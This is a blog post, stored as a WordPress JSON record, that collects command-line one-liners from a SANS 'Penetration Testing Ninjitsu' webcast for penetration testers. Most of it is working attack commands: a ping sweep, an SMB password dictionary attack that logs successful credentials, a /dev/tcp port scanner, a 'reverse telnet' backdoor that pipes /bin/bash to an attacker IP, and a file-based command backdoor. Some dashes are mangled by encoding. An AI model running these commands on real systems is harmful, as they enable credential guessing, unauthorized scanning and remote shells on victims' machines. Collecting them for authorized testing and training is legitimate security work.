{"id":82,"date":"2008-12-02T12:08:37","date_gmt":"2008-12-02T18:08:37","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?p=82"},"modified":"2018-12-28T20:06:26","modified_gmt":"2018-12-29T02:06:26","slug":"penetration-testing-ninjitsu","status":"publish","type":"post","link":"https:\/\/www.jedge.com\/wordpress\/2008\/12\/penetration-testing-ninjitsu\/","title":{"rendered":"Penetration Testing Ninjitsu"},"content":{"rendered":"

Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http:\/\/www.coresecurity.com\/content\/webcast-series-with-sans<\/a>).\u00a0 I highly recommend listening to these web casts and downloading the slides for your reference.\u00a0 I’m including the commands extracted from the slides that can be very useful for a penetration test.<\/p>\n

NOTE: 12\/2018 – Link to the webcast no longer works. The Internet Archive has the slides as a PDF<\/a>. I’ve downloaded it and host it here<\/a> as well.
\n
\nNinjitsu I<\/p>\n

Ping Sweep
\nC:\\> for \/L %i in (1,1,255) do @ping \u2013n 1 10.10.10.%i | find \u201cReply\u201d<\/kbd><\/p>\n

Reverse DNS Lookup
\nC:\\> for \/L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find \"Name\" && echo 10.10.10.%i<\/kbd><\/p>\n

Dictionary Attack
\nC:\\> for \/f %i in (user.txt) do @(for \/f %j in (pass.txt) do @echo %i:%j & @net use \\\\10.10.10.10<\/a> %j \/u:%i 2>nul && echo %i:%j >> success.txt && net use \\\\10.10.10.10<\/a> \/del)<\/kbd><\/p>\n

Ninjitsu II<\/p>\n

Linux Command-Line Port Scanner
\n$ port=1; while [ $port \u2013lt 1024 ]; do echo > \/dev\/tcp\/[IPaddr]\/$port; [ $? == 0 ] && echo $port \"is open\" >> \/tmp\/ports.txt; port=`expr $port + 1`; done<\/kbd><\/p>\n

Linux Command-Line Backdoor via \u201cReverse Telnet\u201d
\n$ telnet [attacker_IPaddr] [port1] | \/bin\/bash | telnet [attacker_IPaddr] [port2]<\/kbd><\/p>\n

The Windows Command Line Port Scanner Using FTP Client
\nC:\\> for \/L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt<\/kbd><\/p>\n

Windows Command-Line File Transfer
\nC:\\> type [filename] > \\\\[machine]\\[share]\\[filename]<\/kbd><\/p>\n

Backdoors: The File Shell
\nC:\\> for \/L %i in (1,0,2) do (for \/f \"delims=^\" %j in (commands.txt) do cmd.exe \/c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1<\/kbd><\/p>\n

Ninjitsu III<\/p>\n

Wireless Sniffing
\nC:\\> for \/L %i in (1,0,2) do @(netsh interface set interface \u201cwireless network connection\u201d disable & ping \u2013n 3 127.0.0.1 >nul & netsh interface set interface \u201cwireless network connection\u201d enable & ping \u2013n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)<\/kbd><\/p>\n

Install Telnet Client Vista
\nC:\\> pkgmgr \/iu:\"TelnetClient\"<\/kbd><\/p>\n

Install Telnet Server Vista
\nC:\\> pkgmgr \/iu:\"TelnetServer\"<\/kbd><\/p>\n

Install IIS 7.0
\nC:\\> pkgmgr \/iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI<\/kbd><\/p>\n

List Domain Password Settings
\nC:\\>net accounts \/domain<\/kbd><\/p>\n","protected":false},"excerpt":{"rendered":"

Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http:\/\/www.coresecurity.com\/content\/webcast-series-with-sans).\u00a0 I highly recommend listening to these web casts and downloading the slides for your reference.\u00a0 I’m including the commands extracted from the slides that can be very useful for a penetration test. NOTE: 12\/2018 – Link to the webcast […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[5,6,7,10],"tags":[87,69,96,56,95,26],"class_list":["post-82","post","type-post","status-publish","format-standard","hentry","category-installing-using-tools","category-fyi","category-scripts","category-using-the-tools","tag-command","tag-command-line","tag-ed-skoudis","tag-penetration-testing","tag-sans","tag-windows"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/82","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=82"}],"version-history":[{"count":12,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/82\/revisions"}],"predecessor-version":[{"id":1188,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/posts\/82\/revisions\/1188"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=82"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/categories?post=82"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/tags?post=82"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}